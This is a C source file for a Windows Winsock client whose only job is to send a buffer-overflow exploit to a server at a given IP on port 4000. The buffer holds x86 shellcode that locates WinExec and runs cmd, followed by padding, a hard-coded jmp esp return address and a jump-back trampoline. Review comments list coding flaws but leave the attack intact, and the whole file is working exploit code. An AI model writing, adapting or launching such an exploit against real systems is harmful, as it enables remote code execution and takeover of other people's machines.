// Run from cmd with the server's IP address as the only argument, e.g. 127.0.0.1
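#include <stdio.h>
#include <stdlib.h>   /* exit(); was missing (the original included <stdio.h> twice), leaving exit() implicitly declared */
#include <winsock.h>
#pragma comment(lib,"Ws2_32")
#define PORT 4000 /* port on the remote host the client connects to */
#define MAXDATASIZE 100 /* maximum bytes per receive; sizes buf[] in main(), which is never read */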
/*
 * Entry point of the client shown on this page.
 *
 * Usage: client <server-ip>
 *
 * Opens a TCP connection to <server-ip>:PORT, sends the fixed szChat
 * buffer once, and disconnects.  szChat is hard-coded: the comments in
 * its initializer describe the layout (shellcode, filler bytes, a 4-byte
 * return-address overwrite, a short trampoline).  The server it is meant
 * for is not part of this file, so nothing here can be checked against
 * the receiving side.
 *
 * Returns 0 after the send; calls exit(1) on a missing argument or on a
 * socket()/connect() failure.
 *
 * NOTE(review): exit() is used below but <stdlib.h> is not among the
 * includes above; WSACleanup() is never called on any path; the return
 * values of WSAStartup(), inet_addr() and send() are not checked; buf and
 * numbytes are declared but never used.
 */
int main(int argc, char *argv[])
{
BYTE szChat[] = {
//cmd shellcode
0xfc, 0x33, 0xd2, 0xb2, 0x30, 0x64, 0xff, 0x32, 0x5a, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,
0x72, 0x28, 0x33, 0xc9, 0xb1, 0x18, 0x33, 0xff, 0x33, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c,
0x20, 0xc1, 0xcf, 0x0d, 0x03, 0xf8, 0xe2, 0xf0, 0x81, 0xff, 0x5b, 0xbc, 0x4a, 0x6a, 0x8b, 0x5a,
0x10, 0x8b, 0x12, 0x75, 0xda, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0xff, 0x72, 0x34, 0x8b, 0x52, 0x78,
0x03, 0xd3, 0x8b, 0x72, 0x20, 0x03, 0xf3, 0x33, 0xc9, 0x41, 0xad, 0x03, 0xc3, 0x81, 0x38, 0x47,
0x65, 0x74, 0x50, 0x75, 0xf4, 0x81, 0x78, 0x04, 0x72, 0x6f, 0x63, 0x41, 0x75, 0xeb, 0x81, 0x78,
0x08, 0x64, 0x64, 0x72, 0x65, 0x75, 0xe2, 0x49, 0x8b, 0x72, 0x24, 0x03, 0xf3, 0x66, 0x8b, 0x0c,
0x4e, 0x8b, 0x72, 0x1c, 0x03, 0xf3, 0x8b, 0x14, 0x8e, 0x03, 0xd3, 0x52, 0x68, 0x78, 0x65, 0x63,
0x01, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x57, 0x69, 0x6e, 0x45, 0x54, 0x53, 0xff, 0xd2, 0x68, 0x63,
0x6d, 0x64, 0x01, 0xfe, 0x4c, 0x24, 0x03, 0x6a, 0x05, 0x33, 0xc9, 0x8d, 0x4c, 0x24, 0x04, 0x51,
0xff, 0xd0, 0x68, 0x65, 0x73, 0x73, 0x01, 0x8b, 0xdf, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x50, 0x72,
0x6f, 0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x54, 0xff, 0x74, 0x24, 0x20, 0xff, 0x54, 0x24, 0x20,
0x57, 0xff, 0xd0,
//filler bytes (padding up to the overwritten return slot)
0xB8,0xDB,0xA1,0xA3,0xCE,0xD2,0xB5,0xC4,0xD7,0xCB,0xC8,0xDD,0xB7,0xE7,0xBB,0xAA,0xBE,0xF8,0xB4,0xFA,
0xA3,0xAC,0xCE,0xD2,0xB5,0xC4,0xD0,0xA6,0xC3,0xB2,0xBF,0xF5,0xCA,0xC0,0xBE,0xF8,0xB3,0xBE,0xA1,0xA3,
0xB7,0xBA,0xD4,0xDA,0xB4,0xBD,0xBC,0xE4,0xB5,0xC4,0xC3,0xDB,0xD0,0xA6,0xA3,0xAC,0xC8,0xB4,0xD4,0xF5,
0xC3,0xB4,0xD2,0xB2,0xB2,0xBB,0xD4,0xB8,0xD2,0xE2,0xD0,0xD1,0xC0,0xB4,0xA1,0xA3,0xB6,0xE0,0xC3,0xB4,
0xD0,0xD2,0xB8,0xA3,0xB5,0xC4,0xCA,0xB1,0xBF,0xCC,0xA3,0xA1,0xCE,0xC7,0xA3,0xAC,0xCC,0xF0,0xC3,0xDB,
0xB5,0xD8,0xC7,0xE3,0xD0,0xBA,0xCF,0xC2,0xC0,0xB4,0xA3,0xBA,0xB6,0xEE,0xC9,0xCF,0xA1,0xA2,0xD1,0xDB,
0xC1,0xB1,0xA1,0xA2,0xB1,0xC7,0xBC,0xE2,0xA1,0xA2,0xC3,0xB5,0xB9,0xE5,0xB5,0xC4,0xB4,0xBD,0xA1,0xA3,
0xC4,0xC7,0xBC,0xA4,0xB6,0xAF,0xB5,0xC4,0xA1,0xA2,0xB2,0xFC,0xB6,0xB6,0xB5,0xC4,0xA1,0xA2,0xBB,0xC5,
0xC2,0xD2,0xB5,0xC4,0xA3,0xAC,0xB3,0xC9,0xB3,0xA4,0xD2,0xD4,0xC0,0xB4,0xB5,0xC4,0xC3,0xCE,0xCF,0xEB,
0xD3,0xEB,0xC5,0xCE,0xCD,0xFB,0xA3,0xAC,0xCE,0xD2,0xCA,0xD6,0xD7,0xE3,0xCE,0xDE,0xB4,0xEB,0xA3,0xA1,
0xBE,0xCD,0xD4,0xDA,0xBA,0xF4,0xCE,0xFC,0xD3,0xEB,0xB4,0xA5,0xBE,0xF5,0xC6,0xB5,0xC1,0xD9,0xBE,0xF8,
0xBE,0xB3,0xB5,0xC4,0xCA,0xB1,0xBA,0xF2,0xA3,0xAC,0xD2,0xC0,0xCF,0xA1,0xB8,0xD0,0xBE,0xF5,0xC4,0xB0,
0xC9,0xFA,0xA3,0xBA,0xCB,0xFB,0xB1,0xA6,0xCA,0xAF,0xB0,0xE3,0xB5,0xC4,0xED,0xF8,0xD7,0xD3,0xA3,0xAC,
0xC6,0xCB,0xF3,0xF9,0xC3,0xD4,0xC0,0xEB,0xB5,0xC4,0xD1,0xDB,0xC9,0xF1,0xA3,0xAC,0xBD,0xC6,0xF7,0xEF,
0xCE,0xA2,0xD1,0xEF,0xB5,0xC4,0xD7,0xEC,0xBD,0xC7,0xA3,0xAC,0xC7,0xE5,0xC7,0xB3,0xF7,0xC8,0xBB,0xF3,
0xB5,0xC4,0xD0,0xA6,0xC8,0xDD,0xA1,0xA3,0xCE,0xD2,0xB5,0xC4,0xCD,0xF5,0xD7,0xD3,0xC4,0xD8,0xA3,0xBF,
0xBB,0xCC,0xBB,0xF3,0xA1,0xA2,0xBE,0xAA,0xBA,0xF4,0xA1,0xA2,0xD5,0xF5,0xD4,0xFA,0xA1,0xAD,0xA1,0xAD,
0xD2,0xBB,0xC7,0xD0,0xC0,0xB4,0xB5,0xC3,0xC4,0xC7,0xC3,0xB4,0xCD,0xBB,0xC8,0xBB,0xA3,0xA1,0xD4,0xDA,
0xCE,0xDE,0xCA,0xFD,0xB5,0xC4,0xC3,0xCE,0xCF,0xEB,0xD6,0xD0,0xA3,0xAC,0xCE,0xD2,0xB6,0xBC,0xCA,0xC7,
0xBE,0xF8,0xC3,0xC0,0xB5,0xC4,0xD7,0xCB,0xCC,0xAC,0xA3,0xAC,0xB3,0xF6,0xCF,0xD6,0xD4,0xDA,0xB0,0xAE,
0xC7,0xE9,0xD6,0xAE,0xC7,0xB0,0xA1,0xA3,0xD5,0xE6,0xB5,0xC4,0xB2,0xBB,0xD6,0xAA,0xB5,0xC0,0xC3,0xFC,
0xD4,0xCB,0xA3,0xAC,0xCE,0xAA,0xCA,0xB2,0xC3,0xB4,0xC8,0xE7,0xB4,0xCB,0xB2,0xBB,0xBF,0xB0,0xA1,0xA3,
0xCB,0xD5,0xD0,0xD1,0xB5,0xC4,0xCA,0xB1,0xBA,0xF2,0xA3,0xAC,0xB0,0xB2,0xD4,0xDA,0xC4,0xB0,0xC9,0xFA,
0xB5,0xC4,0xBE,0xB3,0xB5,0xD8,0xA3,0xAC,0xEB,0xFC,0xEB,0xCA,0xC6,0xAE,0xB7,0xF7,0xB5,0xC4,0xC1,0xB1,
0xE1,0xA3,0xA3,0xAC,0xC3,0xD4,0xC0,0xEB,0xE4,0xD6,0xC8,0xBE,0xD7,0xC5,0xB4,0xBC,0xCF,0xE3,0xA1,0xA3,
0xB7,0xC2,0xB7,0xF0,0xD3,0xD0,0xB8,0xF6,0xC9,0xF9,0xD2,0xF4,0xBA,0xF4,0xBB,0xBD,0xD7,0xC5,0xA3,0xAC,
0xD4,0xD3,0xC2,0xD2,0xCB,0xF6,0xCB,0xE9,0xB5,0xC4,0xBD,0xC5,0xB2,0xBD,0xC9,0xF9,0xA3,0xAC,0xBB,0xCE,
0xB6,0xAF,0xCE,0xDE,0xCA,0xFD,0xBB,0xB6,0xD4,0xC3,0xB5,0xC4,0xC1,0xB3,0xA1,0xAD,0xA1,0xAD,0xB8,0xD0,
0xBE,0xF5,0xA3,0xAC,0xD2,0xC0,0xBE,0xC9,0xC8,0xE1,0xC8,0xED,0xCE,0xDE,0xC1,0xA6,0xA3,0xAC,0xC8,0xE7,
0xCD,0xAC,0xB4,0xB9,0xCB,0xC0,0xD5,0xF5,0xD4,0xFA,0xA3,0xA1,0xC4,0xB3,0xD0,0xA9,0xD6,0xAD,0xD2,0xBA,
0xD4,0xDA,0xB4,0xBD,0xBC,0xE4,0xD3,0xCE,0xB6,0xAF,0xA3,0xAC,0xCB,0xE1,0xCB,0xE1,0xCC,0xF0,0xCC,0xF0,
0xC9,0xAC,0xC9,0xAC,0xB5,0xC4,0xA3,0xAC,0xC9,0xF8,0xCD,0xB8,0xD7,0xC5,0xD7,0xED,0xC8,0xCB,0xB5,0xC4,
0xB7,0xD2,0xB7,0xBC,0xA1,0xA3,0xD2,0xE2,0xCA,0xB6,0xBB,0xBA,0xBB,0xBA,0xC7,0xE5,0xD0,0xD1,0xB9,0xFD,
0xC0,0xB4,0xC1,0xCB,0xA3,0xAC,0xB2,0xBB,0xD6,0xAA,0xCA,0xB2,0xC3,0xB4,0xCA,0xB1,0xBA,0xF2,0xB0,0xB2,
0xBE,0xB2,0xC1,0xCB,0xA3,0xAC,0xC4,0xC7,0xD0,0xA9,0xA1,0xB0,0xC1,0xB3,0xC5,0xD3,0xA1,0xB1,0xB2,0xBB,
0xBC,0xFB,0xC1,0xCB,0xA1,0xA3,0xBB,0xBB,0xB6,0xF8,0xB4,0xFA,0xD6,0xAE,0xA3,0xAC,0xCB,0xC6,0xD4,0xF8,
0xCF,0xE0,0xCA,0xB6,0xA3,0xBA,0xCB,0xFB,0xC4,0xC7,0xC0,0xF5,0xBD,0xF0,0xC9,0xAB,0xB5,0xC4,0xB7,0xA2,
0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,
0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,
0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,0xC4,0xB8,0xDF,0xD4,0xC6,
//end of filler bytes
//next comes the address of a jmp esp; esp ends up 4 bytes past this slot because the callee returns with retn 0x4
0x12,0x45,0xFA,0x7F, //the 4 bytes that land in the saved-return slot (hard-coded address, specific to the original target build)
//filler bytes skipped by the retn 0x4
0x61,0x61,0x61,0x61,
// push eax
// jmp [esp] -- these two instructions jump back to the start of the buffer
0x50, 0xff, 0x24, 0x24,
};
//socket
int sockfd, numbytes; // NOTE(review): sockfd holds a SOCKET (unsigned) in an int; numbytes is never used
char buf[MAXDATASIZE]; // NOTE(review): never read or written
struct sockaddr_in their_addr; /* peer address and port; NOTE(review): not zeroed, so sin_zero is uninitialised */
if (argc != 2)
{
//the server IP argument is required
fprintf(stderr,"usage: client hostname\n");
exit(1);
}
WSADATA ws;
WSAStartup(MAKEWORD(2,2),&ws); //initialise the Windows Sockets DLL; NOTE(review): return value unchecked
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
//exit if socket creation fails
//NOTE(review): Winsock reports failure as INVALID_SOCKET; the == -1 test only works through the unsigned-to-int truncation above
printf("socket error\n");
exit(1);
}
//connect to the peer
their_addr.sin_family = AF_INET; /* address family is INET */
their_addr.sin_port = htons(PORT); /* connect to the peer's PORT */
their_addr.sin_addr.s_addr = inet_addr(argv[1]); /* peer IP; NOTE(review): argv[1] is not validated -- inet_addr() yields INADDR_NONE for a malformed address and connect() is still attempted */
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1)
{
//exit if the connection fails (Winsock returns SOCKET_ERROR here; the value is -1)
printf("connet error\n");
closesocket(sockfd);
exit(1);
}
send(sockfd, (PCHAR)szChat, sizeof(szChat),0); //send the payload once; NOTE(review): return value unchecked, so a short send or SOCKET_ERROR goes unnoticed
closesocket(sockfd);
return 0;
}